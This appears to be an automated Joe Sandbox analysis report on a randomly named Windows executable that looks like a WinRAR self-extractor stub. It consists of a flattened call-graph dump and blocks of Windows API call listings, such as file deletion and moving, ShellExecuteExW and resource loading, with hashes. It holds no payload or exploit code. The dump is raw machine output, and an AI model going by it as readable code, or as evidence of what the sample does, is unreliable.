bb138b 74 API calls 25231->25234 25233->24628 25233->24629 25234->25233 25236 bcb5bc GetDlgItem 25235->25236 25237 bcb583 GetMessageW 25235->25237 25236->24639 25236->24640 25238 bcb5a8 TranslateMessage DispatchMessageW 25237->25238 25239 bcb599 IsDialogMessageW 25237->25239 25238->25236 25239->25236 25239->25238 25354 bc94e0 GetClientRect 25387 bc21e0 26 API calls std::bad_exception::bad_exception 25404 bcf2e0 46 API calls __RTC_Initialize 25405 bdbee0 GetCommandLineA GetCommandLineW 25406 bd0ada 51 API calls 2 library calls 25304 bce2d7 25305 bce1db 25304->25305 25306 bce85d ___delayLoadHelper2@8 14 API calls 25305->25306 25306->25305 25309 bce1d1 14 API calls ___delayLoadHelper2@8 25424 bda3d0 21 API calls 2 library calls 25310 bb10d5 25315 bb5abd 25310->25315 25316 bb5ac7 __EH_prolog 25315->25316 25317 bbb505 84 API calls 25316->25317 25318 bb5ad3 25317->25318 25322 bb5cac GetCurrentProcess GetProcessAffinityMask 25318->25322 25425 be2bd0 VariantClear 25355 bcf4d3 20 API calls 25409 bc62ca 123 API calls __InternalCxxFrameHandler 25389 bcb5c0 100 API calls 25427 bc77c0 118 API calls 25428 bcffc0 RaiseException _com_raise_error _com_error::_com_error 25331 bcdec2 25332 bcdecf 25331->25332 25333 bbe617 53 API calls 25332->25333 25334 bcdedc 25333->25334 25335 bb4092 _swprintf 51 API calls 25334->25335 25336 bcdef1 SetDlgItemTextW 25335->25336 25337 bcb568 5 API calls 25336->25337 25338 bcdf0e 25337->25338 25390 bcf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25430 bcff30 LocalFree 23461 bdbb30 23462 bdbb39 23461->23462 23463 bdbb42 23461->23463 23465 bdba27 23462->23465 23485 bd97e5 GetLastError 23465->23485 23467 bdba34 23505 bdbb4e 23467->23505 23469 bdba3c 23514 bdb7bb 23469->23514 23472 bdba53 23472->23463 23475 bdba96 23539 bd8dcc 23475->23539 23479 bdba91 23538 bd91a8 20 API calls _abort 23479->23538 23481 bdbada 23481->23475 23545 bdb691 26 API calls 23481->23545 23482 bdbaae 23482->23481 23483 bd8dcc _free 20 API calls 23482->23483 23483->23481 23486 bd97fb 23485->23486 23487 bd9801 23485->23487 23546 bdae5b 11 API calls 2 library calls 23486->23546 23491 bd9850 SetLastError 23487->23491 23547 bdb136 23487->23547 23491->23467 23492 bd981b 23494 bd8dcc _free 20 API calls 23492->23494 23496 bd9821 23494->23496 23495 bd9830 23495->23492 23497 bd9837 23495->23497 23498 bd985c SetLastError 23496->23498 23555 bd9649 20 API calls _abort 23497->23555 23556 bd8d24 38 API calls _abort 23498->23556 23501 bd9842 23503 bd8dcc _free 20 API calls 23501->23503 23504 bd9849 23503->23504 23504->23491 23504->23498 23506 bdbb5a ___scrt_is_nonwritable_in_current_image 23505->23506 23507 bd97e5 _abort 38 API calls 23506->23507 23512 bdbb64 23507->23512 23509 bdbbe8 _abort 23509->23469 23512->23509 23513 bd8dcc _free 20 API calls 23512->23513 23559 bd8d24 38 API calls _abort 23512->23559 23560 bdac31 EnterCriticalSection 23512->23560 23561 bdbbdf LeaveCriticalSection _abort 23512->23561 23513->23512 23562 bd4636 23514->23562 23517 bdb7dc GetOEMCP 23520 bdb805 23517->23520 23518 bdb7ee 23519 bdb7f3 GetACP 23518->23519 23518->23520 23519->23520 23520->23472 23521 bd8e06 23520->23521 23522 bd8e44 23521->23522 23526 bd8e14 _abort 23521->23526 23573 bd91a8 20 API calls _abort 23522->23573 23523 bd8e2f RtlAllocateHeap 23525 bd8e42 23523->23525 23523->23526 23525->23475 23528 bdbbf0 23525->23528 23526->23522 23526->23523 23572 bd7a5e 7 API calls 2 library calls 23526->23572 23529 bdb7bb 40 API calls 23528->23529 23530 bdbc0f 23529->23530 23532 bdbc60 IsValidCodePage 23530->23532 23535 bdbc16 23530->23535 23537 bdbc85 _abort 23530->23537 23534 bdbc72 GetCPInfo 23532->23534 23532->23535 23533 bdba89 23533->23479 23533->23482 23534->23535 23534->23537 23584 bcfbbc 23535->23584 23574 bdb893 GetCPInfo 23537->23574 23538->23475 23540 bd8e00 _free 23539->23540 23541 bd8dd7 RtlFreeHeap 23539->23541 23540->23472 23541->23540 23542 bd8dec 23541->23542 23665 bd91a8 20 API calls _abort 23542->23665 23544 bd8df2 GetLastError 23544->23540 23545->23475 23546->23487 23553 bdb143 _abort 23547->23553 23548 bdb183 23558 bd91a8 20 API calls _abort 23548->23558 23549 bdb16e RtlAllocateHeap 23550 bd9813 23549->23550 23549->23553 23550->23492 23554 bdaeb1 11 API calls 2 library calls 23550->23554 23553->23548 23553->23549 23557 bd7a5e 7 API calls 2 library calls 23553->23557 23554->23495 23555->23501 23557->23553 23558->23550 23560->23512 23561->23512 23563 bd4653 23562->23563 23564 bd4649 23562->23564 23563->23564 23565 bd97e5 _abort 38 API calls 23563->23565 23564->23517 23564->23518 23566 bd4674 23565->23566 23570 bd993a 38 API calls __cftof 23566->23570 23568 bd468d 23571 bd9967 38 API calls __cftof 23568->23571 23570->23568 23571->23564 23572->23526 23573->23525 23575 bdb977 23574->23575 23576 bdb8cd 23574->23576 23579 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23575->23579 23591 bdc988 23576->23591 23581 bdba23 23579->23581 23581->23535 23583 bdab78 __vswprintf_c_l 43 API calls 23583->23575 23585 bcfbc4 23584->23585 23586 bcfbc5 IsProcessorFeaturePresent 23584->23586 23585->23533 23588 bcfc07 23586->23588 23664 bcfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23588->23664 23590 bcfcea 23590->23533 23592 bd4636 __cftof 38 API calls 23591->23592 23593 bdc9a8 MultiByteToWideChar 23592->23593 23595 bdc9e6 23593->23595 23603 bdca7e 23593->23603 23597 bd8e06 __vswprintf_c_l 21 API calls 23595->23597 23600 bdca07 _abort __vsnwprintf_l 23595->23600 23596 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23598 bdb92e 23596->23598 23597->23600 23605 bdab78 23598->23605 23599 bdca78 23610 bdabc3 20 API calls _free 23599->23610 23600->23599 23602 bdca4c MultiByteToWideChar 23600->23602 23602->23599 23604 bdca68 GetStringTypeW 23602->23604 23603->23596 23604->23599 23606 bd4636 __cftof 38 API calls 23605->23606 23607 bdab8b 23606->23607 23611 bda95b 23607->23611 23610->23603 23612 bda976 __vswprintf_c_l 23611->23612 23613 bda99c MultiByteToWideChar 23612->23613 23614 bda9c6 23613->23614 23615 bdab50 23613->23615 23618 bd8e06 __vswprintf_c_l 21 API calls 23614->23618 23621 bda9e7 __vsnwprintf_l 23614->23621 23616 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23615->23616 23617 bdab63 23616->23617 23617->23583 23618->23621 23619 bdaa9c 23647 bdabc3 20 API calls _free 23619->23647 23620 bdaa30 MultiByteToWideChar 23620->23619 23622 bdaa49 23620->23622 23621->23619 23621->23620 23638 bdaf6c 23622->23638 23626 bdaaab 23630 bd8e06 __vswprintf_c_l 21 API calls 23626->23630 23633 bdaacc __vsnwprintf_l 23626->23633 23627 bdaa73 23627->23619 23629 bdaf6c __vswprintf_c_l 11 API calls 23627->23629 23628 bdab41 23646 bdabc3 20 API calls _free 23628->23646 23629->23619 23630->23633 23631 bdaf6c __vswprintf_c_l 11 API calls 23634 bdab20 23631->23634 23633->23628 23633->23631 23634->23628 23635 bdab2f WideCharToMultiByte 23634->23635 23635->23628 23636 bdab6f 23635->23636 23648 bdabc3 20 API calls _free 23636->23648 23649 bdac98 23638->23649 23642 bdafdc LCMapStringW 23643 bdaf9c 23642->23643 23644 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23643->23644 23645 bdaa60 23644->23645 23645->23619 23645->23626 23645->23627 23646->23619 23647->23615 23648->23619 23650 bdacc8 23649->23650 23654 bdacc4 23649->23654 23650->23643 23656 bdaff4 10 API calls 3 library calls 23650->23656 23651 bdace8 23651->23650 23653 bdacf4 GetProcAddress 23651->23653 23655 bdad04 _abort 23653->23655 23654->23650 23654->23651 23657 bdad34 23654->23657 23655->23650 23656->23642 23658 bdad4a 23657->23658 23659 bdad55 LoadLibraryExW 23657->23659 23658->23654 23660 bdad8a 23659->23660 23661 bdad72 GetLastError 23659->23661 23660->23658 23663 bdada1 FreeLibrary 23660->23663 23661->23660 23662 bdad7d LoadLibraryExW 23661->23662 23662->23660 23663->23658 23664->23590 23665->23544 25358 bdc030 GetProcessHeap 25360 bdf421 21 API calls __vswprintf_c_l 25391 bdb4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25410 bcc220 93 API calls _swprintf 25362 bb1025 29 API calls 25433 bb1710 86 API calls 25393 bcad10 73 API calls 25365 bca400 GdipDisposeImage GdipFree 25411 bcd600 70 API calls 25366 bd6000 QueryPerformanceFrequency QueryPerformanceCounter 25396 bd2900 6 API calls 4 library calls 25412 bdf200 51 API calls 25434 bda700 21 API calls 24300 bb9f7a 24301 bb9f88 24300->24301 24302 bb9f8f 24300->24302 24303 bb9f9c GetStdHandle 24302->24303 24310 bb9fab 24302->24310 24303->24310 24304 bba003 WriteFile 24304->24310 24305 bb9fcf 24306 bb9fd4 WriteFile 24305->24306 24305->24310 24306->24305 24306->24310 24308 bba095 24312 bb6e98 77 API calls 24308->24312 24310->24301 24310->24304 24310->24305 24310->24306 24310->24308 24311 bb6baa 78 API calls 24310->24311 24311->24310 24312->24301 25435 bb1f72 128 API calls __EH_prolog 25369 bca070 10 API calls 25413 bcb270 99 API calls 25371 bb1075 84 API calls 24339 bb9a74 24343 bb9a7e 24339->24343 24340 bb9ab1 24341 bb9b9d SetFilePointer 24341->24340 24342 bb9bb6 GetLastError 24341->24342 24342->24340 24343->24340 24343->24341 24345 bb9b79 24343->24345 24346 bb981a 24343->24346 24345->24341 24347 bb9833 24346->24347 24349 bb9e80 79 API calls 24347->24349 24348 bb9865 24348->24345 24349->24348 25437 bd7f6e 52 API calls 2 library calls 25414 bd8268 55 API calls _free 25372 bcc793 107 API calls 4 library calls 25242 bccd58 25244 bcce22 25242->25244 25249 bccd7b 25242->25249 25243 bcb314 ExpandEnvironmentStringsW 25254 bcc793 _wcslen _wcsrchr 25243->25254 25244->25254 25270 bcd78f 25244->25270 25246 bcd40a 25248 bc1fbb CompareStringW 25248->25249 25249->25244 25249->25248 25250 bcca67 SetWindowTextW 25250->25254 25253 bd3e3e 22 API calls 25253->25254 25254->25243 25254->25246 25254->25250 25254->25253 25256 bcc855 SetFileAttributesW 25254->25256 25261 bccc31 GetDlgItem SetWindowTextW SendMessageW 25254->25261 25264 bccc71 SendMessageW 25254->25264 25269 bc1fbb CompareStringW 25254->25269 25294 bca64d GetCurrentDirectoryW 25254->25294 25296 bba5d1 6 API calls 25254->25296 25297 bba55a FindClose 25254->25297 25298 bcb48e 76 API calls 2 library calls 25254->25298 25258 bcc90f GetFileAttributesW 25256->25258 25268 bcc86f _abort _wcslen 25256->25268 25258->25254 25260 bcc921 DeleteFileW 25258->25260 25260->25254 25262 bcc932 25260->25262 25261->25254 25263 bb4092 _swprintf 51 API calls 25262->25263 25265 bcc952 GetFileAttributesW 25263->25265 25264->25254 25265->25262 25266 bcc967 MoveFileW 25265->25266 25266->25254 25267 bcc97f MoveFileExW 25266->25267 25267->25254 25268->25254 25268->25258 25295 bbb991 51 API calls 2 library calls 25268->25295 25269->25254 25272 bcd799 _abort _wcslen 25270->25272 25271 bcd9e7 25271->25254 25272->25271 25273 bcd8a5 25272->25273 25274 bcd9c0 25272->25274 25299 bc1fbb CompareStringW 25272->25299 25276 bba231 3 API calls 25273->25276 25274->25271 25278 bcd9de ShowWindow 25274->25278 25277 bcd8ba 25276->25277 25279 bcd8d9 ShellExecuteExW 25277->25279 25300 bbb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25277->25300 25278->25271 25279->25271 25286 bcd8ec 25279->25286 25281 bcd8d1 25281->25279 25282 bcd925 25301 bcdc3b 6 API calls 25282->25301 25283 bcd97b CloseHandle 25284 bcd994 25283->25284 25285 bcd989 25283->25285 25284->25274 25302 bc1fbb CompareStringW 25285->25302 25286->25282 25286->25283 25288 bcd91b ShowWindow 25286->25288 25288->25282 25290 bcd93d 25290->25283 25291 bcd950 GetExitCodeProcess 25290->25291 25291->25283 25292 bcd963 25291->25292 25292->25283 25294->25254 25295->25268 25296->25254 25297->25254 25298->25254 25299->25273 25300->25281 25301->25290 25302->25284 25373 bce455 14 API calls ___delayLoadHelper2@8 25307 bdc051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25374 bca440 GdipCloneImage GdipAlloc 25416 bd3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25439 be1f40 CloseHandle

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00BC0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00BC087C
                                          • Part of subcall function 00BC0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BC088E
                                          • Part of subcall function 00BC0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BC08BF
                                          • Part of subcall function 00BCA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BCA655
                                          • Part of subcall function 00BCAC16: OleInitialize.OLE32(00000000), ref: 00BCAC2F
                                          • Part of subcall function 00BCAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BCAC66
                                          • Part of subcall function 00BCAC16: SHGetMalloc.SHELL32(00BF8438), ref: 00BCAC70
                                        • GetCommandLineW.KERNEL32 ref: 00BCDF5C
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BCDF83
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BCDF94
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00BCDFCE
                                          • Part of subcall function 00BCDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00BCDBF4
                                          • Part of subcall function 00BCDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BCDC30
                                        • CloseHandle.KERNEL32(00000000), ref: 00BCDFD7
                                        • GetModuleFileNameW.KERNEL32(00000000,00C0EC90,00000800), ref: 00BCDFF2
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,00C0EC90), ref: 00BCDFFE
                                        • GetLocalTime.KERNEL32(?), ref: 00BCE009
                                        • _swprintf.LIBCMT ref: 00BCE048
                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BCE05A
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00BCE061
                                        • LoadIconW.USER32(00000000,00000064), ref: 00BCE078
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00BCE0C9
                                        • Sleep.KERNEL32(?), ref: 00BCE0F7
                                        • DeleteObject.GDI32 ref: 00BCE130
                                        • DeleteObject.GDI32(?), ref: 00BCE140
                                        • CloseHandle.KERNEL32 ref: 00BCE183
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                        • API String ID: 3049964643-3743209390
                                        • Opcode ID: 807099b7fa5e1333e901fccb68c8dcba511c19df7bfae11ddd93afbc8acf20d2
                                        • Instruction ID: 768bdcda5b7c044f18a75168004b8c0f3fb679c8c8a28e0b1021472af915bb3e
                                        • Opcode Fuzzy Hash: 807099b7fa5e1333e901fccb68c8dcba511c19df7bfae11ddd93afbc8acf20d2
                                        • Instruction Fuzzy Hash: 8561C171904285ABD320AB75AC8AF7B77ECEB48B04F0404ADF945A72A1DF78D944C762

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 812 bca6c2-bca6df FindResourceW 813 bca7db 812->813 814 bca6e5-bca6f6 SizeofResource 812->814 815 bca7dd-bca7e1 813->815 814->813 816 bca6fc-bca70b LoadResource 814->816 816->813 817 bca711-bca71c LockResource 816->817 817->813 818 bca722-bca737 GlobalAlloc 817->818 819 bca73d-bca746 GlobalLock 818->819 820 bca7d3-bca7d9 818->820 821 bca7cc-bca7cd GlobalFree 819->821 822 bca74c-bca76a call bd0320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 bca76c-bca78e call bca626 822->825 826 bca7c5-bca7c6 GlobalUnlock 822->826 825->826 831 bca790-bca798 825->831 826->821 832 bca79a-bca7ae GdipCreateHBITMAPFromBitmap 831->832 833 bca7b3-bca7c1 831->833 832->833 834 bca7b0 832->834 833->826 834->833
                                        APIs
                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BCB73D,00000066), ref: 00BCA6D5
                                        • SizeofResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA6EC
                                        • LoadResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA703
                                        • LockResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA712
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BCB73D,00000066), ref: 00BCA72D
                                        • GlobalLock.KERNEL32(00000000), ref: 00BCA73E
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BCA762
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BCA7C6
                                          • Part of subcall function 00BCA626: GdipAlloc.GDIPLUS(00000010), ref: 00BCA62C
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BCA7A7
                                        • GlobalFree.KERNEL32(00000000), ref: 00BCA7CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                        • String ID: PNG
                                        • API String ID: 211097158-364855578
                                        • Opcode ID: f199cb2d1cd890fd85ec0b8c694f60d19810946bd73e33f6553b777dafc1d33f
                                        • Instruction ID: d44358eaadd8402511f7e747b88fe9683a62a4cfb64374120da1458c9e7d1c8a
                                        • Opcode Fuzzy Hash: f199cb2d1cd890fd85ec0b8c694f60d19810946bd73e33f6553b777dafc1d33f
                                        • Instruction Fuzzy Hash: 63318D75601346ABC7109F21EC88E2BBBE8FF84B65B00095EF80597661EF31DC40DAA2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1029 bba69b-bba6bf call bcec50 1032 bba6c1-bba6ce FindFirstFileW 1029->1032 1033 bba727-bba730 FindNextFileW 1029->1033 1034 bba742-bba7ff call bc0602 call bbc310 call bc15da * 3 1032->1034 1035 bba6d0-bba6e2 call bbbb03 1032->1035 1033->1034 1036 bba732-bba740 GetLastError 1033->1036 1042 bba804-bba811 1034->1042 1044 bba6fe-bba707 GetLastError 1035->1044 1045 bba6e4-bba6fc FindFirstFileW 1035->1045 1039 bba719-bba722 1036->1039 1039->1042 1047 bba709-bba70c 1044->1047 1048 bba717 1044->1048 1045->1034 1045->1044 1047->1048 1050 bba70e-bba711 1047->1050 1048->1039 1050->1048 1052 bba713-bba715 1050->1052 1052->1039
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6C4
                                          • Part of subcall function 00BBBB03: _wcslen.LIBCMT ref: 00BBBB27
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6F2
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6FE
                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA728
                                        • GetLastError.KERNEL32(?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA734
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                        • String ID:
                                        • API String ID: 42610566-0
                                        • Opcode ID: 2b485b5784f63baf11f54d0f152d8576cc4d99b8bf785898c4be491b36ab1dfc
                                        • Instruction ID: 7bcf304260bafe9dfc37be6840cff771e176a554632cf6268a4344e64dd64ec0
                                        • Opcode Fuzzy Hash: 2b485b5784f63baf11f54d0f152d8576cc4d99b8bf785898c4be491b36ab1dfc
                                        • Instruction Fuzzy Hash: EA414C76900555ABCB25DF68CC88BEAB7F8FB48350F10459AE55AE3201DB746E908F90
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,00BD7DC4,00000000,00BEC300,0000000C,00BD7F1B,00000000,00000002,00000000), ref: 00BD7E0F
                                        • TerminateProcess.KERNEL32(00000000,?,00BD7DC4,00000000,00BEC300,0000000C,00BD7F1B,00000000,00000002,00000000), ref: 00BD7E16
                                        • ExitProcess.KERNEL32 ref: 00BD7E28
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 481b2fdf2028198e624de245701711426c564da7bb02cb3163fd8c2e74e9b982
                                        • Instruction ID: bce8dd7479e0a8c6954d4be0b8b544aa622de38cf9d1a39009dc6460fda4316c
                                        • Opcode Fuzzy Hash: 481b2fdf2028198e624de245701711426c564da7bb02cb3163fd8c2e74e9b982
                                        • Instruction Fuzzy Hash: E6E0B631054188EBCF11AF64DD4DA9ABFEAEB50741B004496F8199B232EF36DE52DB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: dabfea00f0005fe26fe20e7ef823c563294611f087f09d40b4aa9ac7a5852bab
                                        • Instruction ID: ffc1301cfe4b7fd256a988c81a531658dcbf22efcca466a71e2fe4a31b6578d1
                                        • Opcode Fuzzy Hash: dabfea00f0005fe26fe20e7ef823c563294611f087f09d40b4aa9ac7a5852bab
                                        • Instruction Fuzzy Hash: A282D770904245AFDF25DF64C891BFABBEDEF15300F0845F9E9499B242DBB15A88CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BCB7E5
                                          • Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
                                          • Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCB8D1
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB8EF
                                        • IsDialogMessageW.USER32(?,?), ref: 00BCB902
                                        • TranslateMessage.USER32(?), ref: 00BCB910
                                        • DispatchMessageW.USER32(?), ref: 00BCB91A
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00BCB93D
                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00BCB960
                                        • GetDlgItem.USER32(?,00000068), ref: 00BCB983
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BCB99E
                                        • SendMessageW.USER32(00000000,000000C2,00000000,00BE35F4), ref: 00BCB9B1
                                          • Part of subcall function 00BCD453: _wcslen.LIBCMT ref: 00BCD47D
                                        • SetFocus.USER32(00000000), ref: 00BCB9B8
                                        • _swprintf.LIBCMT ref: 00BCBA24
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                          • Part of subcall function 00BCD4D4: GetDlgItem.USER32(00000068,00C0FCB8), ref: 00BCD4E8
